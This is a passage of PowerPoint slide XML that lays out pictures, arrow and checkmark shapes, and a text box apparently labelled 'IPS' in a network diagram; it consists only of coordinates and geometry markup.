              <a:ext cx="1223772" cy="1508760"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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1DF91FC2-2039-AC79-F9AB-629FF13A941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6238" y="2471927"/>
              <a:ext cx="1758188" cy="1223772"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="object 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B160EA4-4F47-F82C-54C8-5FAAE51873A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593" y="3542283"/>
              <a:ext cx="1131163" cy="1363560"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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A87B8E25-15BA-DC76-8675-7B60B1E376FF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1879473" y="3832225"/>
              <a:ext cx="2044700" cy="398145"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="385610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2285" y="398119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2009746" y="48141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2007713" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2024518" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030858" y="33019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2033255" y="31622"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032833" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032889" y="44107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2009746" y="48141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1957577" y="92125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1957197" y="96138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1961768" y="101498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1965705" y="101841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2044191" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033255" y="31622"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2009746" y="48141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032889" y="44107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032833" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2029587" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2029587" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="2030858" y="33019"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2027681" y="33019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2029587" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032833" y="43802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030858" y="33019"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2044700" h="398145">
                  <a:moveTo>
                    <a:pt x="1947926" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1944369" y="1650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1941829" y="8255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1943480" y="11937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1946782" y="13081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2019383" y="40016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2024518" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2007290" y="35687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2030602" y="31622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2033255" y="31622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1951227" y="1143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194792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B32F4759-67CC-D495-D753-75F34752C07E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7859776" y="2528442"/>
              <a:ext cx="455930" cy="514350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="455929" h="514350">
                  <a:moveTo>
                    <a:pt x="441578" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="436499" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427448" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388540" y="13747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377951" y="27558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351493" y="63526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326058" y="101023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301636" y="140057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278213" y="180633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255777" y="222757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234640" y="265796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214965" y="308963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196753" y="352264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180004" y="395705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164719" y="439293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157104" y="423219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137447" y="389501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112375" y="354161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84077" y="320581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56260" y="294258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52197" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43560" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="309880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="314198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="324357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="329056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14224" y="343662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19176" y="348488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28632" y="358374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66833" y="400780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94265" y="436340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121427" y="476138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136017" y="495934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139573" y="505840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="511301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154431" y="513842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159893" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173354" y="514223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214959" y="467193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227393" y="433165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254000" y="367538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282670" y="304784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313054" y="244601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345058" y="187451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378205" y="133731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412861" y="82423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451739" y="29209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453390" y="26288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455295" y="21208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="18161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="10032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453771" y="6350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446024" y="1269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44157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61CAA0FB-CF15-CBEF-F507-97A01CB7F4B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7859776" y="2528442"/>
              <a:ext cx="455930" cy="514350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="455929" h="514350">
                  <a:moveTo>
                    <a:pt x="436499" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441578" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446024" y="1269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449833" y="3809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453771" y="6350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="10032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="14858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455675" y="18161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449325" y="32257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430873" y="57185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395301" y="107946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361489" y="160162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328914" y="215598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297648" y="274365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268120" y="335845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240399" y="399946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214959" y="467193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203073" y="502031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202056" y="504951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187578" y="512190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184530" y="512952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180975" y="513461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177165" y="513842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173354" y="514223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169545" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165607" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159893" y="514350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154431" y="513842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149225" y="512571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="511301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139573" y="505840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136017" y="495934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128609" y="486078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121427" y="476138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114460" y="466127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107696" y="456056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101004" y="446031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94265" y="436340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66833" y="400780"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37385" y="367664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14224" y="343662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9905" y="338708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5969" y="333882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="329056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="324357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="319531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="314198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="309880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6096" y="306450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10159" y="303021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14477" y="300355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19303" y="298450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24002" y="296544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28955" y="295275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34035" y="294386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39116" y="293624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43560" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47117" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52197" y="293243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56260" y="294258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59308" y="296418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62356" y="298576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98583" y="337073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125475" y="371856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148002" y="406622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164719" y="439293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180004" y="395705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196753" y="352264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214965" y="308963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234640" y="265796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255777" y="222757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278213" y="180633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301636" y="140057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326058" y="101023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="351493" y="63526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="377951" y="27558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382835" y="19962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418766" y="1349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427448" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436499" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9144">
              <a:solidFill>
                <a:srgbClr val="243355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784B2F9B-7EB6-6F40-10F6-FF2A2F22783A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5001641" y="2913506"/>
              <a:ext cx="2915285" cy="1573530"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2915284" h="1573529">
                  <a:moveTo>
                    <a:pt x="2741549" y="1535303"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2664206" y="1473327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661539" y="1471129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2657475" y="1471574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2653157" y="1477048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2653538" y="1481048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2656332" y="1483233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706852" y="1523733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540" y="1121854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762" y="1134427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2704896" y="1536293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641600" y="1561617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2639949" y="1565313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2641346" y="1568577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2642616" y="1571828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646299" y="1573415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2730436" y="1539748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2741549" y="1535303"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2915284" h="1573529">
                  <a:moveTo>
                    <a:pt x="2915158" y="27813"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2904350" y="24765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2819781" y="889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2816352" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2812923" y="1905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2811907" y="5334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2811018" y="8636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2812923" y="12192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2816352" y="13081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2878569" y="30695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="775843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3302" y="788162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2881807" y="42989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833370" y="91059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833370" y="95123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2838323" y="100076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2842387" y="100076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2844800" y="97536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2915158" y="2781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80DE6C0F-140D-BE8B-039D-DA44219E311B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6090538" y="3877183"/>
              <a:ext cx="553720" cy="737870"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="553720" h="737870">
                  <a:moveTo>
                    <a:pt x="447802" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="81279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119125" y="737387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492252" y="669658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553338" y="581482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4478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80AB66F8-9FB0-F3B9-6D09-BE6B05F24A05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6582791" y="4458665"/>
              <a:ext cx="61594" cy="88265"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="61595" h="88264">
                  <a:moveTo>
                    <a:pt x="61086" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4063" y="25768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61086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107DF30D-4B78-1F53-45A7-F529C8F80C71}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6090538" y="3877183"/>
              <a:ext cx="553720" cy="737870"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="553720" h="737870">
                  <a:moveTo>
                    <a:pt x="492252" y="669658"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496315" y="607250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553338" y="581482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492252" y="669658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119125" y="737387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="81279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447802" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553338" y="581482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9D961577-081F-38BA-6A6B-34348B662B0F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6300216" y="2968497"/>
              <a:ext cx="492759" cy="593090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="492759" h="593089">
                  <a:moveTo>
                    <a:pt x="69469" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="548385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352425" y="592963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431927" y="531368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492379" y="53593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69469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DC017979-8809-B9F4-9167-1BA218237721}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6652641" y="3499866"/>
              <a:ext cx="80010" cy="61594"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="80009" h="61595">
                  <a:moveTo>
                    <a:pt x="79501" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21208" y="6984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="61594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="795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2E533958-6D4A-9624-DCC0-128CABF1D1CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6300216" y="2968497"/>
              <a:ext cx="492759" cy="593090"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="492759" h="593089">
                  <a:moveTo>
                    <a:pt x="352425" y="592963"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="373634" y="538352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431927" y="531368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352425" y="592963"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69469" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492379" y="53593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431927" y="531368"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25399">
              <a:solidFill>
                <a:srgbClr val="2C2C2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18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D01475E6-53DE-629D-9183-03D099EE45D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4429023" y="4319995"/>
            <a:ext cx="306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IPS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19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B09C8CE2-E90C-F7BA-FAAE-7165597FF71B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8022488" y="4159442"/>
            <a:ext cx="638810" cy="639445"/>
            <a:chOff x="7963535" y="4158564"/>
            <a:chExt cx="638810" cy="639445"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437A49D4-10D2-C7C4-8C8E-F89DB2EC0853}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
